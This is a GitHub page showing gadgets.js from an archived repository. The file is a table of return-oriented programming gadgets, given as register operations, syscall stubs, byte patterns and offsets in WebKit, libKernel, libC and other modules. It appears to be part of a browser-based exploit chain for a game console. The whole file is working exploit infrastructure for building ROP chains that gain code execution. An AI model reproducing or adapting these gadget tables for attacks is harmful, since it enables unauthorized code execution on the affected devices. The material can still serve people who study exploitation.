This repository has been archived by the owner on Oct 13, 2019. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 26
/
gadgets.js
77 lines (61 loc) · 3.69 KB
/
gadgets.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
var moduleBases = [];
var libKernel = 1;
var libC = 2;
var webkit = 14;
var libSystemService = 18;
var gadgets = {
"pop rbp": new gadget([0x5d], webkit, 0xb5d6d),
"pop rax": new gadget([0x58], webkit, 0x3352d),
"pop rcx": new gadget([0x59], webkit, 0x2bec0d),
"pop rdx": new gadget([0x5a, 0xff, 0xc5], webkit, 0x3bbf9e),
"pop rsi": new gadget([0x5e], webkit, 0x3914ca),
"pop rdi": new gadget([0x5f], webkit, 0x137cbd),
"pop r8": new gadget([0x41, 0x58], webkit, 0xb854d),
"pop r9": new gadget([0x43, 0x59], webkit, 0x2bfe89),
"pop rsp": new gadget([0xf3, 0x5c], webkit, 0x5fbb5),
"mov r10, rcx and syscall": new gadget([0x49, 0x89, 0xca, 0x0f, 0x05], libKernel, 0x457),
"mov [rax+0x1e8], rdx": new gadget([0x48, 0x89, 0x90, 0xe8, 0x01, 0x00, 0x00], libKernel, 0x1622),
"mov [rax+0x60], rdi": new gadget([0x48, 0x89, 0x78, 0x60], webkit, 0x2b7274),
"mov [rax+0x8], rsi": new gadget([0x48, 0x89, 0x70, 0x08], libKernel, 0x9414),
"mov [rax+0xc0], rcx": new gadget([0x48, 0x89, 0x88, 0xc0, 0x00, 0x00, 0x00], webkit, 0x369e6d),
"mov [rax], rcx": new gadget([0x48, 0x89, 0x08], webkit, 0x9ecde6),
"mov [rax], rdx": new gadget([0x48, 0x89, 0x10], webkit, 0x3579c0),
"mov [rax], rsi": new gadget([0x48, 0x89, 0x30], webkit, 0x2adea7),
"mov [rcx], rax": new gadget([0x48, 0x89, 0x01], webkit, 0xc320),
"mov [rcx], rdx": new gadget([0x48, 0x89, 0x11], 12, 0x5b00),
"mov [rdx], rcx": new gadget([0x48, 0x89, 0x0a], 16, 0x340bd),
"mov [rdx], rsi": new gadget([0x48, 0x89, 0x32], 16, 0x1b822),
"mov [rsi+0x18], rax": new gadget([0x48, 0x89, 0x46, 0x18], webkit, 0x470f5),
"mov [rsi+0x8], r8": new gadget([0x4c, 0x89, 0x46, 0x08], webkit, 0x14af6d),
"mov [rsi], rcx": new gadget([0x48, 0x89, 0x0e], webkit, 0x38c39f),
"mov [rdi], rax": new gadget([0x48, 0x89, 0x07], libKernel, 0xb0c8),
"mov [rdi+0x88], rax": new gadget([0x48, 0x89, 0x87, 0x88, 0x00, 0x00, 0x00], webkit, 0x1c0e03),
"mov [rdi+0xa0], rcx": new gadget([0x48, 0x89, 0x8f, 0xa0, 0x00, 0x00, 0x00], webkit, 0xb6b5),
"mov [rdi+0x80], rdx": new gadget([0x48, 0x89, 0x97, 0x80, 0x00, 0x00, 0x00], webkit, 0xa2da64),
"mov [rdi+0x80], rsi": new gadget([0x48, 0x89, 0xb7, 0x80, 0x00, 0x00, 0x00], webkit, 0x3dc290),
"mov [rdi+0x20], r8": new gadget([0x4c, 0x89, 0x47, 0x20], 12, 0x40415),
"mov [rdi+0x20], rdx": new gadget([0x48, 0x89, 0x57, 0x20], 12, 0x38796),
"mov [r10], rdi": new gadget([0x49, 0x89, 0x3a], 16, 0x1ba44),
"mov [r10], rdx": new gadget([0x49, 0x89, 0x12], 16, 0x1b79b),
"mov [r10], rsi": new gadget([0x49, 0x89, 0x32], 16, 0x1b8cd),
"mov rdi, [rdi+0x48]": new gadget([0x48, 0x8b, 0x7f, 0x48], libKernel, 0x1bd50),
"mov rax, [rax+0x830]": new gadget([0x48, 0x8b, 0x80, 0x30, 0x08, 0x00, 0x00], 19, 0x1957),
"mov rax, [rdi]": new gadget([0x48, 0x8b, 0x07], libKernel, 0x172b0),
"mov rax, [rdi+0x18]": new gadget([0x48, 0x8b, 0x47, 0x18], libKernel, 0x172f0),
"mov rax, [r10]": new gadget([0x49, 0x8b, 0x02], 16, 0xd93d),
"mov rax, [r11]": new gadget([0x49, 0x8b, 0x03], 16, 0xd936),
"mov rdx, [rdi+0x8]": new gadget([0x48, 0x8b, 0x57, 0x08], libC, 0x6573),
"mov rax, rdi": new gadget([0x48, 0x89, 0xf8], libKernel, 0x1dc20),
"mov rax, rsi": new gadget([0x48, 0x89, 0xf0], libKernel, 0x94d1),
"mov rax, r8": new gadget([0x4c, 0x89, 0xc0], 16, 0xeb36),
"mov rdx, rdi": new gadget([0x48, 0x89, 0xfa], libC, 0x860f),
"call rax": new gadget([], libKernel, 0x48),
"call rbx": new gadget([], libKernel, 0x6143),
"call rcx": new gadget([], libKernel, 0x1128d),
"call rdx": new gadget([], libKernel, 0x100c3),
"call rsi": new gadget([], libKernel, 0xe1c8),
"jmp rax": new gadget([], libKernel, 0x94),
"jmp rbx": new gadget([], libKernel, 0x26ac7),
"jmp rcx": new gadget([], libKernel, 0xb9c6),
"jmp rdx": new gadget([], libKernel, 0x666d),
}